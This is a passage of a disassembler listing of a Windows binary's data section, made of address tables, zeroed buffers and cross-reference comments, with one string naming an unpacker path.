; sub_40888A+3C9�r ...
dword_44B5C8 dd 7620E8C3h ; DATA XREF: sub_40888A+83B�w
; sub_40888A+88E�r ...
dword_44B5CC dd 77DD23D7h ; DATA XREF: sub_403FBB+53�r
; sub_40888A+2A5�w ...
dword_44B5D0 dd 76214750h ; DATA XREF: sub_405084+3A�r
; sub_40888A+82E�w ...
dword_44B5D4 dd 77E6D75Bh ; DATA XREF: sub_40888A+B3�w
dword_44B5D8 dd 7620BD61h ; DATA XREF: sub_405084+109�r
; sub_40888A+848�w ...
dword_44B5DC dd 71AB60C9h ; DATA XREF: sub_40888A+52F�w
; sub_40888A+6B2�r ...
dword_44B5E0 dd 77EBA6E9h ; DATA XREF: sub_40888A+58�w
; sub_40888A+CA�r ...
dword_44B5E4 dd 76D62A58h ; DATA XREF: sub_40888A+916�w
; sub_40B0E5+11A�r
dword_44B5E8 dd 76F36EAAh ; DATA XREF: sub_40888A+A66�w
; sub_40888A+A6D�r ...
dword_44B5EC dd 77E802FCh ; DATA XREF: sub_40888A+A6�w
; sub_40888A+F2�r
dword_44B5F0 dd 77C75455h ; DATA XREF: sub_403948+119�r
; sub_40888A+462�w ...
dword_44B5F4 dd 71AB12A7h ; DATA XREF: sub_402D28+20�r
; sub_40888A+5D8�w ...
dword_44B5F8 dd 71C574FAh ; DATA XREF: sub_40888A+9A0�w
; sub_40888A+A08�r
dword_44B5FC dd 71AB1746h ; DATA XREF: sub_40465D+A5�r
; sub_40888A+5CB�w ...
dword_44B600 dd 71B28D0Dh ; DATA XREF: sub_4010E6+9A�r
; sub_40888A+B21�w
dword_44B604 dd 762211EFh ; DATA XREF: sub_40888A+7E0�w
; sub_40888A+84F�r ...
dword_44B608 dd 77D902E3h ; DATA XREF: sub_40888A+1B3�w
; sub_409D0C+15�r
dword_44B60C dd 71C2FA86h ; DATA XREF: sub_40888A+979�w
; sub_40888A+9F0�r ...
dword_44B610 dd 77DE1291h ; DATA XREF: sub_40888A+36E�w
; sub_40888A+3B9�r ...
dword_44B614 dd 77E2C1B3h ; DATA XREF: sub_40888A+37B�w
; sub_40888A+3C1�r ...
dword_44B618 dd 73B81E3Bh ; DATA XREF: sub_403B83+28�r
; sub_403D7C+2B�r ...
dword_44B61C dd 71ABF628h ; DATA XREF: sub_40888A+68E�w
; sub_41301C+D0�r
dword_44B620 dd 71AB1836h ; DATA XREF: sub_404CEF:loc_40501A�r
; sub_405084+46C�r ...
dword_44B624 dd 77C72889h ; DATA XREF: sub_403948+207�r
; sub_40888A+496�w
dword_44B628 dd 71C453F8h ; DATA XREF: sub_40888A+9C7�w
; sub_40888A+A20�r ...
dword_44B62C dd 77DD5C55h ; DATA XREF: sub_4038C0+51�r
; sub_40888A+2B2�w ...
dword_44B630 dd 77E96645h ; DATA XREF: sub_4058B3+25�r
; sub_4058B3+39�r ...
dword_44B634 dd 77428B97h ; DATA XREF: sub_405084+33C�r
; sub_40888A+B6E�w ...
dword_44B638 dd 71AB41DAh ; DATA XREF: sub_404CEF+2F�r
; sub_407D34+17�r ...
dword_44B63C dd 762059A3h ; DATA XREF: sub_40888A+807�w
; sub_40888A+872�r ...
dword_44B640 dd 71C4A1B4h ; DATA XREF: sub_40888A+986�w
; sub_40888A+9F8�r
dword_44B644 dd 1F7CD214h ; DATA XREF: sub_40888A+BDF�w
; sub_40888A+C10�r
dword_44B648 dd 77D4456Bh ; DATA XREF: sub_4085A9+40�r
; sub_4085A9+63�r ...
dword_44B64C dd 76D629BBh ; DATA XREF: sub_40888A+8FC�w
; sub_40888A+910�r ...
dword_44B650 dd 1F7B9D96h ; DATA XREF: sub_40888A+BF9�w
dword_44B654 dd 71AB1740h ; DATA XREF: .text:00402FC5�r
; sub_404CEF:loc_404FE4�r ...
dword_44B658 dd 7620AFB6h ; DATA XREF: sub_40888A+821�w
; sub_40888A+855�r
dword_44B65C dd 77D5C13Ah ; DATA XREF: sub_4085A9+50�r
; sub_4085A9+78�r ...
dword_44B660 dd 77D45B19h ; DATA XREF: sub_403B83+3F�r
; sub_403B83+69�r ...
dword_44B664 dd 71AB157Eh ; DATA XREF: sub_40465D+9C�r
; sub_40888A+65A�w ...
dword_44B668 dd 71AB3E5Dh ; DATA XREF: sub_4013F1+20A�r
; .text:00401909�r ...
dword_44B66C dd 71AB14DCh ; DATA XREF: sub_40888A+549�w
; sub_40888A+6BE�r ...
dword_44B670 dd 0CC0004h ; DATA XREF: sub_405084+34�r
; sub_40888A+8BD�w ...
dword_44B674 dd 77DD590Bh ; DATA XREF: sub_4038C0+26�r
; sub_40888A+28B�w ...
dword_44B678 dd 71ABD755h ; DATA XREF: sub_40888A+681�w
; sub_40888A+79E�r ...
dword_44B67C dd 77DF7311h ; DATA XREF: sub_40888A+30F�w
; sub_40888A+323�r ...
dword_44B680 dd 77DDA2AFh ; DATA XREF: sub_40888A+395�w
; sub_40888A+3D1�r ...
dword_44B684 dd 1F7CD927h ; DATA XREF: sub_40888A+BD2�w
; sub_40888A+C08�r
dword_44B688 dd 76206853h ; DATA XREF: sub_40888A+7FA�w
; sub_40888A+86A�r ...
dword_44B68C dd 77D4932Ch ; DATA XREF: sub_4085A9+FC�r
; sub_40888A+206�w ...
dword_44B690 dd 77D5E310h ; DATA XREF: sub_40888A+18C�w
; sub_40888A+1D2�r ...
dword_44B694 dd 76206B7Fh ; DATA XREF: sub_40888A+814�w
; sub_40888A+87A�r ...
dword_44B698 dd 71AB1444h ; DATA XREF: .text:00403025�r
; sub_40888A+606�w ...
dword_44B69C dd 77DD189Ah ; DATA XREF: sub_4038C0+5A�r
; sub_403FBB+19A�r ...
dword_44B6A0 dd 71AB3F8Dh ; DATA XREF: sub_404CEF+6F�r
; sub_407E55+AA�r ...
dword_44B6A4 dd 77DD5D20h ; DATA XREF: sub_40888A+302�w
; sub_40888A+316�r ...
dword_44B6A8 dd 71AB1890h ; DATA XREF: sub_402E0C+82�r
; sub_40465D+1B7�r ...
dword_44B6AC dd 77C76B34h ; DATA XREF: sub_403948+16�r
; sub_40888A+42E�w ...
dword_44B6B0 dd 77D5E38Ch ; DATA XREF: sub_40888A+199�w
; sub_40888A+1DA�r ...
dword_44B6B4 dd 77DDA20Bh ; DATA XREF: sub_40888A+347�w
; sub_40888A+39C�r ...
dword_44B6B8 dd 76F36EEBh ; DATA XREF: sub_40888A+A73�w
dword_44B6BC dd 71AB12A7h ; DATA XREF: sub_402D28+2B�r
; sub_40465D+156�r ...
dword_44B6C0 dd 71AB1746h ; DATA XREF: sub_4013F1+1BA�r
; .text:004017F1�r ...
dword_44B6C4 dd 77EBA595h ; DATA XREF: sub_40888A+4B�w
; sub_40888A+C2�r ...
dword_44B6C8 dd 77C7531Dh ; DATA XREF: sub_403948+2C�r
; sub_403948+38�r ...
dword_44B6CC dd 77D4BDCAh ; DATA XREF: sub_40888A+165�w
; sub_40888A+1BA�r ...
dword_44B6D0 dd 71C3516Ah ; DATA XREF: sub_40888A+9E1�w
; sub_40AD78+72�r
dword_44B6D4 dd 71AB32CAh ; DATA XREF: sub_40888A+667�w
; sub_40888A+78E�r
dword_44B6D8 dd 71AB5690h ; DATA XREF: sub_4013F1+23B�r
; sub_4013F1+263�r ...
dword_44B6DC dd 1F7CB8F8h ; DATA XREF: sub_40888A+BEC�w
; sub_40888A+C18�r
dword_44B6E0 dd 77EBB1E7h ; DATA XREF: sub_40888A+3E�w
; sub_40888A+BA�r ...
dword_44B6E4 dd 77DD59F0h ; DATA XREF: sub_4038C0+45�r
; sub_40888A+298�w ...
dword_44B6E8 dd 71AB5DE2h ; DATA XREF: sub_40465D+F3�r
; sub_406D34+9E�r ...
dword_44B6EC dd 71AB3ECEh ; DATA XREF: sub_40465D+78�r
; sub_406D34+89�r ...
dword_44B6F0 dd 73B81B0Fh ; DATA XREF: sub_40888A+C63�w
; sub_40C50A+4642�r
dword_44B6F4 dd 76204E4Dh ; DATA XREF: sub_405084+4DC�r
; sub_40888A+85B�w ...
dword_44B6F8 dd 0 ; DATA XREF: sub_40888A+112�w
dword_44B6FC dd 1F7D886Ah ; DATA XREF: sub_40888A+BB8�w
; sub_40888A+BF3�r
dword_44B700 dd 71AB12F8h ; DATA XREF: sub_4013F1+1C8�r
; .text:004017FF�r ...
dword_44B704 dd 77C76551h ; DATA XREF: sub_403948+BC�r
; sub_40888A+43B�w ...
dword_44B708 dd 77C729E2h ; DATA XREF: sub_403948+FB�r
; sub_40888A+47C�w ...
dword_44B70C dd 77C7212Fh ; DATA XREF: sub_403948+65�r
; sub_40888A+448�w ...
dword_44B710 dd 71AB1AF4h ; DATA XREF: sub_4013F1+221�r
; sub_4013F1+249�r ...
dword_44B714 dd 77D5E303h ; DATA XREF: sub_40888A+1A6�w
; sub_40888A+1E2�r ...
dword_44B718 dd 71C4576Ch ; DATA XREF: sub_40888A+9D4�w
; sub_40888A+A28�r ...
dword_44B71C dd 77D4702Fh ; DATA XREF: sub_403B83+53�r
; sub_403B83+7F�r ...
dword_44B720 dd 77E6C0E3h ; DATA XREF: sub_40562C+4�r
; sub_40888A+8C�w ...
dword_44B724 dd 71AB1ED3h ; DATA XREF: .text:00402FB7�r
; sub_404CEF+2C2�r ...
dword_44B728 dd 71B2A381h ; DATA XREF: sub_40888A+B14�w
; sub_40888A+B30�r
dword_44B72C dd 77DDA595h ; DATA XREF: sub_40888A+31C�w
; sub_40B487+55�r
dword_44B730 dd 77DD22EAh ; DATA XREF: sub_403FBB+3A�r
; sub_40888A+27E�w ...
dword_44B734 dd 773F97B0h ; DATA XREF: sub_40888A+B7B�w
dword_44B738 dd 76D67A29h ; DATA XREF: sub_40888A+ABD�w
; sub_40AF08+D4�r
dword_44B73C dd 76D674FAh ; DATA XREF: sub_40888A+AB0�w
; sub_40888A+AB7�r ...
dword_44B740 dd 71AB3C22h ; DATA XREF: sub_4013F1+18D�r
; .text:004017C4�r ...
dword_44B744 dd 71AB2BBFh ; DATA XREF: sub_404416+50�r
; sub_40888A+674�w ...
dword_44B748 dd 1F7BA3A9h ; DATA XREF: sub_40888A+BC5�w
; sub_40888A+C00�r
dword_44B74C dd 71AB401Ch ; DATA XREF: sub_40291D+1F�r
; sub_403076+86�r ...
dword_44B750 dd 71C214BAh ; DATA XREF: sub_40888A+993�w
; sub_40888A+A00�r ...
dword_44B754 dd 71AB868Dh ; DATA XREF: sub_40465D+1F1�r
; sub_406D34+13A�r ...
dword_44B758 dd 71AB1A6Dh ; DATA XREF: sub_4013F1:loc_401669�r
; sub_4013F1+28C�r ...
dword_44B75C dd 71AB155Ah ; DATA XREF: sub_402E0C+4C�r
; sub_406D34+B7�r ...
dword_44B760 dd 71B22C25h ; DATA XREF: sub_401000+B3�r
; sub_401000+CB�r ...
dword_44B764 dd 71AB5A01h ; DATA XREF: sub_404CEF+4F�r
; sub_40888A+522�w ...
dword_44B768 dd 71B2ACCBh ; DATA XREF: sub_40888A+AFA�w
; sub_40888A+B1B�r
dword_44B76C dd 77E78C17h ; DATA XREF: sub_40888A+31�w
; sub_40888A+AD�r ...
dword_44B770 dd 77D49A11h ; DATA XREF: sub_403B83+1EC�r
; sub_403D7C+232�r ...
align 8
dword_44B778 dd 76D62A37h ; DATA XREF: sub_40888A+909�w
; sub_40888A+91D�r ...
dword_44B77C dd 77E6CBF9h ; DATA XREF: sub_40888A+99�w
; sub_40888A+EA�r ...
dword_44B780 dd 0 ; DATA XREF: sub_40888A:loc_408988�w
; sub_40888A+12B�w ...
dword_44B784 dd 0 ; DATA XREF: sub_40888A+126�w
; sub_409517+1C�r
dword_44B788 dd 0 ; DATA XREF: sub_40888A:loc_408A78�w
; sub_40888A:loc_408ADF�w ...
dword_44B78C dd 0 ; DATA XREF: sub_40888A+250�w
; sub_409517+50�r
dword_44B790 dd 0 ; DATA XREF: sub_40888A:loc_408B74�w
; sub_40888A:loc_408BB9�w ...
dword_44B794 dd 0 ; DATA XREF: sub_40888A+400�w
; sub_409517+84�r
dword_44B798 dd 0 ; DATA XREF: sub_40888A:loc_408D70�w
; sub_409517:loc_4095C7�r
dword_44B79C dd 0 ; DATA XREF: sub_40888A+4E1�w
; sub_409517+B8�r
dword_44B7A0 dd 0 ; DATA XREF: sub_40888A:loc_409041�w
; sub_409517:loc_4095FB�r
dword_44B7A4 dd 0 ; DATA XREF: sub_40888A+7B2�w
; sub_409517+EC�r
dword_44B7A8 dd 0 ; DATA XREF: sub_40888A:loc_40912C�w
; sub_40888A+8D1�w ...
dword_44B7AC dd 0 ; DATA XREF: sub_40888A+8CC�w
; sub_409517+120�r
dword_44B7B0 dd 0 ; DATA XREF: sub_40888A:loc_4091C0�w
; sub_409517:loc_409663�r ...
dword_44B7B4 dd 0 ; DATA XREF: sub_40888A+931�w
; sub_409517+154�r
dword_44B7B8 dd 0 ; DATA XREF: sub_40888A:loc_4092CB�w
; sub_409517:loc_409697�r ...
dword_44B7BC dd 0 ; DATA XREF: sub_40888A+A3C�w
; sub_409517+188�r
dword_44B7C0 dd 0 ; DATA XREF: sub_40888A:loc_409315�w
; sub_409517:loc_4096CB�r
dword_44B7C4 dd 0 ; DATA XREF: sub_40888A+A86�w
; sub_409517+1BC�r
dword_44B7C8 dd 0 ; DATA XREF: sub_40888A:loc_40935F�w
; sub_409517:loc_4096FF�r
dword_44B7CC dd 0 ; DATA XREF: sub_40888A+AD0�w
; sub_409517+1F0�r
dword_44B7D0 dd 0 ; DATA XREF: sub_40888A:loc_4093D3�w
; sub_409517:loc_409733�r
dword_44B7D4 dd 0 ; DATA XREF: sub_40888A+B44�w
; sub_409517+224�r
dword_44B7D8 dd 0 ; DATA XREF: sub_40888A:loc_40941D�w
; sub_409517:loc_409767�r
dword_44B7DC dd 0 ; DATA XREF: sub_40888A+B8E�w
; sub_409517+258�r
dword_44B7E0 dd 0 ; DATA XREF: sub_40888A:loc_4094BB�w
; sub_409517:loc_40979B�r
dword_44B7E4 dd 0 ; DATA XREF: sub_40888A+C2C�w
; sub_409517+28C�r
dword_44B7E8 dd 0 ; DATA XREF: sub_40888A:loc_409505�w
; sub_409517:loc_4097CF�r
dword_44B7EC dd 0 ; DATA XREF: sub_40888A+C76�w
; sub_409517+2C0�r
dword_44B7F0 dd 81h dup(0) ; DATA XREF: sub_409AA0+6A�o
dword_44B9F4 dd 0 ; DATA XREF: sub_409D2E+E9�o
dword_44B9F8 dd 17h dup(0) ; DATA XREF: sub_409FDF:loc_40A0FC�o
; sub_409FDF+131�o ...
dword_44BA54 dd 80h dup(0) ; DATA XREF: sub_40AD78+7C�o
; sub_40AD78+A5�o
dword_44BC54 dd 0 ; DATA XREF: sub_40A359+45�w
; sub_40A359+4D�r ...
dword_44BC58 dd 17h dup(0) ; DATA XREF: sub_40AC44:loc_40AD66�o
; sub_40AC44+12D�o
dword_44BCB4 dd 80h dup(0) ; DATA XREF: sub_40A29A+4B�o
; sub_40A29A+7D�o ...
byte_44BEB4 db 0 ; DATA XREF: sub_40A359+29�r
; sub_40A359+34�w
align 4
dword_44BEB8 dd 80h dup(0) ; DATA XREF: sub_40A5B0+61�o
; sub_40A5B0+88�o ...
dword_44C0B8 dd 81h dup(0) ; DATA XREF: sub_409EB6+33�o
; sub_409EB6+50�o ...
dword_44C2BC dd 5 dup(0) ; DATA XREF: sub_40AFEC+32�o
dword_44C2D0 dd 2 dup(0) ; DATA XREF: .text:0040AE47�o
dword_44C2D8 dd 0 ; DATA XREF: sub_4034E9+A�o
; sub_4034E9+44�r ...
dd 5 dup(0)
dword_44C2F0 dd 0 ; DATA XREF: sub_4034E9+60�r
; sub_40C50A+B4D�r
dd 2D9h dup(0)
dword_44CE58 dd 0 ; DATA XREF: sub_403076+A5�r
; sub_4034E9+2D�o ...
dd 7Fh dup(0)
dword_44D058 dd 0 ; DATA XREF: sub_4161EB+41�w
; sub_416326+40�w ...
dword_44D05C dd 0 ; DATA XREF: sub_403076:loc_4030BD�r
; sub_403076+7C�r ...
dword_44D060 dd 0 ; DATA XREF: sub_412E64+168�w
; sub_4143B6+AE�w ...
dword_44D064 dd 0 ; DATA XREF: sub_405938+C�r
; sub_406D34+7E�w ...
dword_44D068 dd 0 ; DATA XREF: sub_41299C+11E�w
; sub_412B83+53�r ...
dword_44D06C dd 0 ; DATA XREF: sub_402994+122�w
; sub_402994+242�w ...
byte_44D070 db 0 ; DATA XREF: sub_40C22A+91�o
; sub_40C50A+3367�r ...
align 4
dd 2177h dup(0)
db 3 dup(0)
byte_455653 db 0 ; DATA XREF: .data:00443810�o
dd 3Fh dup(0)
db 3 dup(0)
byte_455753 db 0 ; DATA XREF: .data:00443818�o
dd 3EFCh dup(0)
db 0
byte_465345 db 3 dup(0) ; DATA XREF: .data:00443B54�o
dd 3FFFh dup(0)
db 0
byte_475345 db 3 dup(0) ; DATA XREF: .data:00443970�o
dd 6B45h dup(0)
dword_49005C dd 6E3h dup(0) ; DATA XREF: .data:off_43454C�o
; .data:off_434560�o
dword_491BE8 dd 1Ch ; DATA XREF: sub_402853:loc_4028C1�r
; sub_40BBCB+3D�w ...
align 10h
dword_491BF0 dd 0 ; DATA XREF: sub_40BBCB:loc_40C13C�o
dword_491BF4 dd 20h dup(0) ; DATA XREF: sub_40BBCB+509�o
; sub_40BBCB+5C2�o ...
dword_491C74 dd 10h dup(0) ; DATA XREF: sub_40BBCB+520�o
dword_491CB4 dd 24h dup(0) ; DATA XREF: sub_40BBCB+537�o
dword_491D44 dd 0 ; DATA XREF: sub_40BBCB+52B�w
; sub_40BBCB+5D9�w ...
dword_491D48 dd 0 ; DATA XREF: sub_40BBCB+54A�w
dd 3 dup(0)
byte_491D58 db 0 ; DATA XREF: sub_40C392+28�r
; sub_40C392+30�o
align 4
byte_491D5C db 0 ; DATA XREF: sub_40BBCB:loc_40C1C6�r
; sub_40BBCB+609�o
align 10h
dword_491D60 dd 0 ; DATA XREF: sub_40BBCB+61F�o
dword_491D64 dd 0 ; DATA XREF: sub_40BBCB+631�o
dword_491D68 dd 0 ; DATA XREF: sub_40BBCB+576�w
; sub_40BBCB+58D�r ...
dword_491D6C dd 0 ; DATA XREF: sub_40BBCB+50E�w
; sub_40C50A+89B�r
dword_491D70 dd 0 ; DATA XREF: .data:0043E38C�o
dword_491D74 dd 0 ; DATA XREF: sub_40BBCB+24D�o
dword_491D78 dd 0 ; DATA XREF: sub_40C50A+6169�o
dword_491D7C dd 0 ; DATA XREF: sub_40C50A+5588�o
dword_491D80 dd 0 ; DATA XREF: sub_40C50A+50A1�o
dword_491D84 dd 0 ; DATA XREF: sub_40C50A+1C3B�o
dword_491D88 dd 0 ; DATA XREF: sub_40C50A+1EC5�o
dword_491D8C dd 0 ; DATA XREF: sub_40C50A+3292�o
dword_491D90 dd 0 ; DATA XREF: sub_412C20:loc_412C41�r
; sub_412D0F+54�r ...
dword_491D94 dd 0 ; DATA XREF: sub_412C20�r
; sub_412D0F+37�r ...
dword_491D98 dd 0 ; DATA XREF: sub_412C50+1A�r
; sub_412E64+83�o
dword_491D9C dd 0 ; DATA XREF: sub_412C20:loc_412C34�r
; sub_412E64+11B�w
dword_491DA0 dd 0Dh dup(0) ; DATA XREF: sub_412D0F+13�o
; sub_412E64:loc_412FA5�o
dword_491DD4 dd 0 ; DATA XREF: sub_412D0F+CD�r
; sub_412D0F+EC�r ...
dd 0
dword_491DDC dd 0 ; DATA XREF: sub_412C88+9�o
dword_491DE0 dd 0 ; DATA XREF: sub_412E64+DF�o
dword_491DE4 dd 0 ; DATA XREF: sub_412E64:loc_412FA0�o
dword_491DE8 dd 0 ; DATA XREF: sub_416433+16�o
; sub_416452+19�o
dword_491DEC dd 0 ; DATA XREF: sub_4163E6+3D�o
dword_491DF0 dd 0 ; DATA XREF: sub_41301C+146�r
align 8
dword_491DF8 dd 2 dup(0) ; DATA XREF: sub_41301C+139�o
dword_491E00 dd 0 ; DATA XREF: .text:0041370A�o
dword_491E04 dd 0 ; DATA XREF: sub_413802+33�o
dword_491E08 dd 0 ; DATA XREF: sub_413802+63�o
dword_491E0C dd 81h dup(0) ; DATA XREF: sub_413913+8D�o
byte_492010 db 0 ; DATA XREF: sub_4147FB+6A�r
; sub_4147FB+98�w
align 8
dword_492018 dd 0Eh dup(0) ; DATA XREF: sub_415273+47�o
dword_492050 dd 2 dup(0) ; DATA XREF: sub_415430+13�o
byte_492058 db 0 ; DATA XREF: sub_415CF4+20A�r
align 4
dword_49205C dd 950F60h ; DATA XREF: sub_416B00+262�w
; sub_416F00:loc_41733B�r ...
dword_492060 dd 14C5h ; DATA XREF: sub_416B00:loc_416D13�r
; sub_416B00+21C�w ...
dword_492064 dd 946660h ; DATA XREF: sub_416B00:loc_416D49�r
; sub_416B00+252�r ...
dword_492068 dd 110Ah ; DATA XREF: sub_416B00+222�r
; sub_416B00+22A�w ...
dword_49206C dd 110Ah ; DATA XREF: sub_416B00+235�r
; sub_416B00+243�w ...
dword_492070 dd 0 ; DATA XREF: .text:0041A3C4�r
; .text:0041A3CF�w
dword_492074 dd 0 ; DATA XREF: sub_41A330+10�w
dword_492078 dd 0 ; DATA XREF: sub_41ABD0+88�r
; sub_41ABD0+F8�w
align 10h
dword_492080 dd 0 ; DATA XREF: sub_41ABD0+7D�r
; sub_41ABD0+100�w ...
byte_492084 db 2 dup(0) ; DATA XREF: sub_41ABD0+109�w
word_492086 dw 0 ; DATA XREF: sub_41ABD0+52�r
dword_492088 dd 0 ; DATA XREF: sub_41ABD0+3D�r
; sub_41ABD0+112�w ...
dword_49208C dd 0 ; DATA XREF: sub_41ABD0+11A�w
dword_492090 dd 0 ; DATA XREF: sub_4282A0+217�r
dword_492094 dd 0A28h ; DATA XREF: sub_418030:loc_418086�r
; sub_41B970+2C�w ...
dword_492098 dd 501h ; DATA XREF: sub_41B970+64�w
dword_49209C dd 5 ; DATA XREF: sub_41B970+4F�w
; sub_41B970+55�r
dword_4920A0 dd 1 ; DATA XREF: sub_41B970+3E�w
; sub_41B970+5E�r
dword_4920A4 dd 1 ; DATA XREF: sub_40BBCB:loc_40BEC0�r
; sub_425390+C6�w
dword_4920A8 dd 950B00h ; DATA XREF: sub_40BBCB+2FE�r
; sub_40BBCB+31E�r ...
align 10h
dword_4920B0 dd 950A60h ; DATA XREF: sub_425240+7B�w
; sub_425240+81�r ...
dword_4920B4 dd 0 ; DATA XREF: sub_430740+49�r
dword_4920B8 dd 0 ; DATA XREF: sub_42F770+24�r
; sub_430240+6�r ...
align 10h
off_4920C0 dd offset aCM_unpackerPac ; DATA XREF: sub_425390+26�w
; sub_425390+3C�r
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4920C8 db 0 ; DATA XREF: sub_41B390+30�w
; sub_421210+8�r
align 4
dword_4920CC dd 0 ; DATA XREF: sub_41B390:loc_41B3B3�w
dword_4920D0 dd 0 ; DATA XREF: sub_41B390+9�r
; sub_41B390:loc_41B45B�w
dword_4920D4 dd 0 ; DATA XREF: sub_41B390+95�r
; sub_41B390+AF�w
dword_4920D8 dd 0 ; DATA XREF: sub_41B970+C3�w
; sub_425240+1B�r ...
align 10h
dword_4920E0 dd 0 ; DATA XREF: sub_41BAE0+3�r
; sub_41BB10+3�r ...
dword_4920E4 dd 0 ; DATA XREF: sub_416A10+9�r
; sub_416A30+F�r ...
dword_4920E8 dd 0 ; DATA XREF: .text:0041BB4E�r
; .text:0041BB59�w ...
align 10h
dword_4920F0 dd 143E60h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_442C5C�o
dword_492108 dd 143DE8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_442C9C�o
dword_492120 dd 143E38h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_442C7C�o
dword_492138 dd 143E10h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_442C8C�o
dword_492150 dd 0 ; DATA XREF: sub_41BF80+93�r
; sub_41BF80+C8�w ...
dword_492154 dd 0 ; DATA XREF: sub_421980:loc_421C45�r
; sub_421980+2CE�w ...
dword_492158 dd 1 ; DATA XREF: sub_422F40+26�r
; sub_422F40+4B�w ...
dword_49215C dd 0 ; DATA XREF: sub_423930+C7�o
; sub_423930+140�o
word_492160 dw 0 ; DATA XREF: sub_423930+E8�r
align 4
dword_492164 dd 0 ; DATA XREF: sub_423930+EF�w
; sub_423930+159�o
dword_492168 dd 0 ; DATA XREF: sub_423690+82�r
; sub_423690+DD�w ...
align 10h
dword_492170 dd 0 ; DATA XREF: sub_41A5E0+D�r
; sub_41A5E0:loc_41A676�r ...
dword_492174 dd 0 ; DATA XREF: sub_42A430+4�r
dword_492178 dd 0 ; DATA XREF: sub_42A100+18�r
dword_49217C dd 0 ; DATA XREF: sub_429780+4�r
dword_492180 dd 0 ; DATA XREF: sub_41B0E0+B9�r
; sub_41B0E0+16C�r ...
dword_492184 dd 0 ; DATA XREF: sub_423690+11F�w
dword_492188 dd 0 ; DATA XREF: sub_423FC0+A6�r
; sub_423FC0+C9�w ...
align 10h
dword_492190 dd 1 ; DATA XREF: sub_4241C0:loc_4244D2�r
; sub_424510+3�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_425390+19�o
; sub_425390+26�o ...
align 10h
dd 3Ah dup(0)
dword_492298 dd 1 ; DATA XREF: sub_4258A0+14�r
; sub_4258A0+2C�w ...
dword_49229C dd 0 ; DATA XREF: sub_426060+2B�r
; sub_426060+34�r
dword_4922A0 dd 0 ; DATA XREF: .text:loc_426666�r
; .text:00426672�w ...
dword_4922A4 dd 0 ; DATA XREF: .text:loc_42667A�r
; .text:00426685�w ...
dword_4922A8 dd 0 ; DATA XREF: .text:loc_42668D�r
; .text:00426699�w ...
dword_4922AC dd 0 ; DATA XREF: .text:loc_4266A0�r
; .text:004266AC�w ...
dword_4922B0 dd 0 ; DATA XREF: .text:loc_4265FA�r
; .text:00426615�w
dword_4922B4 dd 0 ; DATA XREF: sub_426B40+D�r
; sub_426B40+39�w ...
dword_4922B8 dd 0 ; DATA XREF: sub_426B40+5A�w
; sub_426B40:loc_426BB3�r ...
dword_4922BC dd 0 ; DATA XREF: sub_426B40+6E�w
; sub_426B40+8B�r ...
dword_4922C0 dd 1 ; DATA XREF: sub_426F40+26�r
; sub_426F40+46�w ...
dword_4922C4 dd 0 ; DATA XREF: sub_421980+9�r
dword_4922C8 dd 0 ; DATA XREF: sub_429780+75�r
; sub_429780+86�r ...
dword_4922CC dd 0 ; DATA XREF: sub_42A100+25�o
; sub_42A100+93�r ...
dword_4922D0 dd 0 ; DATA XREF: sub_42A100+42�o
; sub_42A100+A3�r ...
dword_4922D4 dd 0 ; DATA XREF: sub_42A100+5F�o
; sub_42A100+7C�r ...
dword_4922D8 dd 0 ; DATA XREF: sub_42A430+A0�r
; sub_42A430+B1�r ...
dword_4922DC dd 0 ; DATA XREF: sub_42A890+2AA�r
; sub_42A890+2B5�r ...
dword_4922E0 dd 0 ; DATA XREF: sub_42A890+2CC�r
; sub_42A890+2D7�r ...
dword_4922E4 dd 3 dup(0) ; DATA XREF: sub_423690+94�o
; sub_423690+F3�o
word_4922F0 dw 0 ; DATA XREF: sub_42A890+36�r
align 8
word_4922F8 dw 0 ; DATA XREF: sub_42A560+F�r
align 4
db 2 dup(0)
word_4922FE dw 0 ; DATA XREF: sub_42A100+F�r
db 2 dup(0)
word_492302 dw 0 ; DATA XREF: sub_429860+F�r
word_492304 dw 0 ; DATA XREF: sub_429860+1A�r
align 4
dword_492308 dd 0 ; DATA XREF: sub_42ACC0+155�r
; sub_42ACC0+176�r ...
dword_49230C dd 0 ; DATA XREF: sub_42AF50+37�w
; sub_42B010+1B�r ...
dword_492310 dd 0 ; DATA XREF: sub_42AF50+6E�w
; sub_42B010+101�r ...
dword_492314 dd 0 ; DATA XREF: sub_42AF50+1A�w
; sub_42AF50+47�r ...
dword_492318 dd 0 ; DATA XREF: sub_42ACC0+45�w
; sub_42ACC0+4B�r ...
dword_49231C dd 0 ; DATA XREF: sub_42ACC0+7A�w
; sub_42ACC0+80�r ...
dword_492320 dd 0 ; DATA XREF: sub_42ACC0:loc_42AD69�w
; sub_42ACC0:loc_42ADCE�r ...
dword_492324 dd 0 ; DATA XREF: sub_42ACC0+182�r
; sub_42ACC0+1CB�r ...
dword_492328 dd 0 ; DATA XREF: sub_42ACC0+6�r
; sub_42ACC0+2C�w ...
align 10h
dword_492330 dd 0 ; DATA XREF: sub_42BAC0+17�w
; sub_42BAC0+6D�w ...
align 8
dword_492338 dd 0 ; DATA XREF: sub_42BAC0+59�o
; sub_42BAC0+77�r
dword_49233C dd 10h dup(0) ; DATA XREF: sub_42BAC0+103�o
word_49237C dw 0 ; DATA XREF: sub_42BEA0+FC�r
word_49237E dw 0 ; DATA XREF: sub_42BAC0+88�r
; sub_42BEA0+145�r ...
word_492380 dw 0 ; DATA XREF: sub_42BEA0+132�r
word_492382 dw 0 ; DATA XREF: sub_42BEA0+13B�r
; sub_42BEA0+18B�r
word_492384 dw 0 ; DATA XREF: sub_42BEA0+126�r
; sub_42BEA0+181�r
word_492386 dw 0 ; DATA XREF: sub_42BEA0+11C�r
; sub_42BEA0+177�r
word_492388 dw 0 ; DATA XREF: sub_42BEA0+113�r
; sub_42BEA0+16E�r
word_49238A dw 0 ; DATA XREF: sub_42BEA0+109�r
; sub_42BEA0+164�r
dword_49238C dd 0 ; DATA XREF: sub_42BAC0+93�r
; sub_42BAC0+CE�r
dword_492390 dd 10h dup(0) ; DATA XREF: sub_42BAC0+149�o
word_4923D0 dw 0 ; DATA XREF: sub_42BEA0+43�r
word_4923D2 dw 0 ; DATA XREF: sub_42BAC0+AB�r
; sub_42BEA0+8C�r ...
word_4923D4 dw 0 ; DATA XREF: sub_42BEA0+79�r
